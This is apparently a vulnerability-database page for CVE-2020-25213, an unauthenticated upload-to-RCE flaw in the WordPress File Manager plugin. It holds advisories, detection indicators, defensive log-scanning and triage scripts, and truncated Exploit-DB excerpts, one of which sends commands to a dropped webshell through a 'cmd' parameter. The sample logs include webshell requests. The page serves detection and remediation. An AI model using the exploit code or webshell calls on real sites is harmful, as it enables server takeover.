CVE-2020-25213
Published: 2020-09-09
Priority: P1 · 99 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability (remediation due 2022-05-03)
Exploited in the wild
EPSS: 97.33% (99.9th percentile)
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| filemanagerpro | file_manager | < 6.9 | 6.9 |
Detection & IOCs (extracted from sources)
- Detect unauthenticated POST requests to the vulnerable elFinder connector endpoint, which requires no authentication and accepts arbitrary file uploads.
- Monitor for GET requests to PHP files dropped under the wp-file-manager lib/files/ directory, especially with a 'cmd' query parameter indicating webshell execution.
- Fingerprint the vulnerable endpoint by sending a bare GET/POST; a response of {"error":["errUnknownCmd"]} confirms the vulnerable connector is exposed.
- Palo Alto Networks Threat Prevention covers this vulnerability with TID 59286; use this signature ID for NGFW detection.
- The Nuclei template matcher looks for both 'poc.txt' and 'added' in the JSON response body, with Content-Type application/json and HTTP 200, to confirm successful exploitation.
- The vulnerable file connector.minimal.php is only present in wp-file-manager versions 6.0 through 6.8; version 6.9 removes the file and is not vulnerable.
- The connector endpoint has no access restrictions whatsoever: no authentication is required to reach or abuse it, so network-layer blocking is the most reliable mitigation if patching is delayed.
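The first two indicators above (requests to the connector, and PHP being served out of lib/files/) as detection logic over web-server access logs. This is an added example, not code from any source on this page; the log lines are constructed and the indicator names are ours. The normalization step matters: the Exploit-DB script later on this page reaches its webshell through lib/php/../files/shell.php, so a matcher on the raw request string would never see lib/files/.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example: classify web-server access-log lines for the request
# patterns listed above. Log lines below are constructed, not real traffic.

PLUGIN_DIR = "/wp-content/plugins/wp-file-manager"
CONNECTOR = PLUGIN_DIR + "/lib/php/connector.minimal.php"
FILES_DIR = PLUGIN_DIR + "/lib/files/"

# Apache/nginx "combined" log format, up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def normalize_path(raw_target):
    """Return (normalized path, query dict) for a request target.

    URL-decodes the path, then collapses '.' and '..' segments, so that
    '/lib/php/../files/shell.php' and its %2e%2e-encoded form both map to
    '/lib/files/shell.php', which is where the uploaded file really sits.
    """
    parts = urlsplit(raw_target)
    path = posixpath.normpath(unquote(parts.path))
    return path, parse_qs(parts.query)


def classify(line):
    """Return the indicator names triggered by one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, query = normalize_path(m.group("target"))
    hits = []
    # Any request to the bundled elFinder connector is notable: the plugin
    # never calls it itself and it enforces no authentication.
    if path == CONNECTOR:
        hits.append("connector_probe" if m.group("method") == "GET" else "connector_post")
    # A PHP file served out of the upload directory is a dropped webshell
    # until proven otherwise; a 'cmd' parameter means it is being driven.
    if path.startswith(FILES_DIR) and path.lower().endswith(".php"):
        hits.append("php_in_upload_dir")
        if "cmd" in query:
            hits.append("webshell_command")
    return hits


def scan(lines):
    """Map line index -> indicators for every line that triggers something."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}


# Constructed sample traffic: benign login page, connector probe, connector
# POST (upload), webshell call via lib/php/../files/, and an encoded variant.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Sep/2020:10:00:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
    '203.0.113.5 - - [01/Sep/2020:10:00:01 +0000] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 33',
    '203.0.113.5 - - [01/Sep/2020:10:00:02 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 412',
    '203.0.113.5 - - [01/Sep/2020:10:00:03 +0000] "GET /wp-content/plugins/wp-file-manager/lib/php/../files/shell.php?cmd=id HTTP/1.1" 200 96',
    '203.0.113.5 - - [01/Sep/2020:10:00:04 +0000] "GET /wp-content/plugins/wp-file-manager/lib/php/%2e%2e/files/x.PHP?cmd=uname+-a HTTP/1.1" 200 96',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

Run it against a real access log by feeding the file's lines to scan(). Because the connector is never used by the plugin's own UI, even a GET probe that returns errUnknownCmd is worth an alert; a POST followed by a GET to a new .php under lib/files/ from the same client is the full exploitation sequence.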
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | | 10.0 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
GHSA
GHSA-w774-7g7w-83fx: The File Manager (wp-file-manager) plugin before 6
ghsa_unreviewed · 2022-05-24 · HIGH · CWE-434
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.
VulnCheck
WordPress File Manager Plugin Remote Code Execution Vulnerability
vulncheck · 2020 · CVSS 10.0 · CRITICAL · CWE-434
WordPress File Manager plugin contains a remote code execution vulnerability that allows unauthenticated users to execute PHP code and upload malicious files on a target site.
Affected: WordPress File Manager Plugin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2020-25213; https://unit42.paloaltonetworks.com/cve-2020-25213/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2020-25213; https://dashboard.shadowserver.org/statis
CISA
WordPress File Manager Plugin Remote Code Execution Vulnerability
cisa · 2021-11-03 · CVSS 9.8 · CRITICAL · CWE-434
Affected: WordPress File Manager Plugin
WordPress File Manager plugin contains a remote code execution vulnerability that allows unauthenticated users to execute PHP code and upload malicious files on a target site.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
Remediation Due Date: 2022-05-03
No detection rules found.
Exploit-DB
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
exploitdb · 2023-04-03 · CVSS 10.0 · CRITICAL
---
```python
#!/usr/bin/env python3
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
import sys, signal, time, requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig, frame):
    print("[!] Exiting")
    sys.exit(1)

signal.signal(signal.SIGINT, handler)

def commandexec(command):
    # The webshell is reached through lib/php/../files/, which the server
    # resolves to lib/files/shell.php, the elFinder upload directory.
    exec_url = url + "/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
    params = {
        "cmd": command
    }
    r = requests.get(exec_url, params=params)
    soup = BeautifulSoup(r.text, 'html.parser')
    te
```
Exploit-DB
WordPress Plugin Wp-FileManager 6.8 - RCE
exploitdb · 2020-12-02 · CVSS 10.0 · CRITICAL
---
```bash
# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE
# Date: September 4,2020
# Exploit Author: Mansoor R (@time4ster)
# CVE: CVE-2020-25213
# Version Affected: 6.0 to 6.8
# Vendor URL: https://wordpress.org/plugins/wp-file-manager/
# Patch: Upgrade to wp-file-manager 6.9 (or above)
# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04
#!/bin/bash
#Description:
#The core of the issue began with the File Manager plugin renaming the extension on the elFinder library's connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to
```
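The root cause described in that listing (an example connector shipped with a .php extension) gives a host-side check that does not depend on network visibility. The following triage script is an added example, not code from the Exploit-DB author, the plugin vendor, or any other source on this page. It uses two facts the sources do state: connector.minimal.php exists only in 6.0 through 6.8 and is gone in 6.9, and uploads land as PHP files under lib/files/. Reading the plugin version from the "Stable tag" line of readme.txt is a WordPress plugin-packaging convention assumed here; the plugin tree it scans is constructed in a temporary directory.

```python
import os
import re
import tempfile

# Added example: host-side triage of one wp-file-manager plugin directory.
# Version parsing from readme.txt "Stable tag" is an assumption (WordPress
# packaging convention), not something the sources above describe.

FIXED_VERSION = (6, 9)
CONNECTOR_REL = "lib/php/connector.minimal.php"
UPLOAD_DIR_REL = "lib/files"
# Extensions a typical PHP handler will execute; anything with one of these
# under the upload directory is treated as a dropped webshell.
EXEC_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}


def parse_version(readme_text):
    """Turn 'Stable tag: 6.8' into a comparable tuple, or None if absent."""
    m = re.search(r"^Stable tag:\s*([\d.]+)\s*$", readme_text, re.MULTILINE)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None


def triage(plugin_dir):
    """Report version, vulnerable-range verdict, connector presence, and any
    executable files under lib/files/ (relative, forward-slash paths)."""
    result = {"version": None, "vulnerable_version": None,
              "connector_present": False, "suspicious_files": []}
    readme = os.path.join(plugin_dir, "readme.txt")
    if os.path.isfile(readme):
        with open(readme, encoding="utf-8", errors="replace") as fh:
            result["version"] = parse_version(fh.read())
        if result["version"] is not None:
            result["vulnerable_version"] = result["version"] < FIXED_VERSION
    # The renamed example connector is the direct indicator of an affected
    # build, whatever readme.txt claims: a half-applied update can lie.
    result["connector_present"] = os.path.isfile(os.path.join(plugin_dir, CONNECTOR_REL))
    upload_dir = os.path.join(plugin_dir, UPLOAD_DIR_REL)
    for root, _dirs, files in os.walk(upload_dir):
        for name in files:
            if os.path.splitext(name)[1].lower() in EXEC_EXT:
                rel = os.path.relpath(os.path.join(root, name), plugin_dir)
                result["suspicious_files"].append(rel.replace(os.sep, "/"))
    result["suspicious_files"].sort()
    return result


def build_fixture(version, with_connector, dropped_files):
    """Constructed plugin tree in a temp dir, for demonstration only."""
    base = tempfile.mkdtemp(prefix="wp-file-manager-")
    os.makedirs(os.path.join(base, "lib", "php"))
    os.makedirs(os.path.join(base, "lib", "files"))
    with open(os.path.join(base, "readme.txt"), "w") as fh:
        fh.write("=== File Manager ===\nStable tag: %s\n" % version)
    if with_connector:
        open(os.path.join(base, CONNECTOR_REL), "w").close()
    for name in dropped_files:
        open(os.path.join(base, "lib", "files", name), "w").close()
    return base


if __name__ == "__main__":
    print(triage(build_fixture("6.8", True, ["shell.php", "poc.txt"])))
    print(triage(build_fixture("6.9", False, [])))
```

Point triage() at wp-content/plugins/wp-file-manager on a real host. A 6.9 install with the connector still on disk, or any .php under lib/files/, means the update alone did not clean up: the upload directory has to be emptied and the site treated as compromised, since the Unit42 reporting on this page shows the dropped webshells were used to stage further malware.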
Metasploit
WordPress File Manager Unauthenticated Remote Code Execution
metasploit
The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
Nuclei
WordPress File Manager Plugin - Remote Code Execution
nuclei · CVSS 9.8 · CRITICAL
The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
Template:
```yaml
id: CVE-2020-25213
# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
  name: WordPress File Manager Plugin - Remote Code Execution
  author: foulenzer
  severity: critical
  description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress s
```
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys · 2022-02-23
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Tenable
One Year Later: What Can We Learn from Zerologon?
blogs_tenable · 2021-08-11
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42 · 2021-04-12 · CVE-2020-28188 · CVSS 7.5 · HIGH
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Authors: Lei Xu, Yue Guan, Vaibhav Singhal · Published: April 12, 2021
Tags: Malware, Trend Reports, Vulnerabilities, Botnet, DDoS, Exploit kit, IoT, Network security trends
Unit42
Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
blogs_unit42 · 2021-02-05 · CVE-2020-25213 · CVSS 5.4 · MEDIUM
## Executive Summary
In December 2020, Unit 42 researchers observed attempts to exploit CVE-2020-25213, which is a file upload vulnerability in the WordPress File Manager plugin. Successful exploitation of this vulnerability allows an attacker to upload an arbitrary file with arbitrary names and extensions, leading to Remote Code Execution (RCE) on the targeted web server.
This exploit was used by attackers to install webshells, which in turn were used to install Kinsing, malware that runs a malicious cryptominer from the H2miner family. Kinsing is based on the Golang programming language, and its ultimate purpose is to be used in cryptojacking attacks on container environments.
Palo Alto Networks customers are protected from CVE-2020-25213 and Kinsing with Cortex XDR, AutoFocus and Nex
Authors: Nadav Markus, Efi Barkayev, Gal De Leon · Published: February 5, 2021
Tags: Threat Research, Vulnerabilities, Cryptocurrency mining, Cryptojacking, CVE-2020-25213, Kinsing, Remote Code Execution, WordPress
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42 · 2021-01-22 · CVE-2012-2311 · CVSS 9.8 · CRITICAL
Authors: Yue Guan, Lei Xu, Ken Hsu, Zhibin Zhang · Published: January 22, 2021
Tags: Malware, Trend Reports, Vulnerabilities, DDoS, Exploits, IoT, Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Tenable
CVE-2020-25213: Critical Vulnerability in File Manager WordPress Plugin Exploited in the Wild
blogs_tenable · 2020-09-02 · CVSS 10.0 · CRITICAL
References
- http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html
- https://github.com/w4fz5uck5/wp-file-manager-0day
- https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html
- https://plugins.trac.wordpress.org/changeset/2373068
- https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
- https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
- https://wordpress.org/plugins/wp-file-manager/#developers
- https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-25213
Timeline
- 2020-09-09: Published
- 2021-11-03: Added to CISA KEV
- Exploited in the wild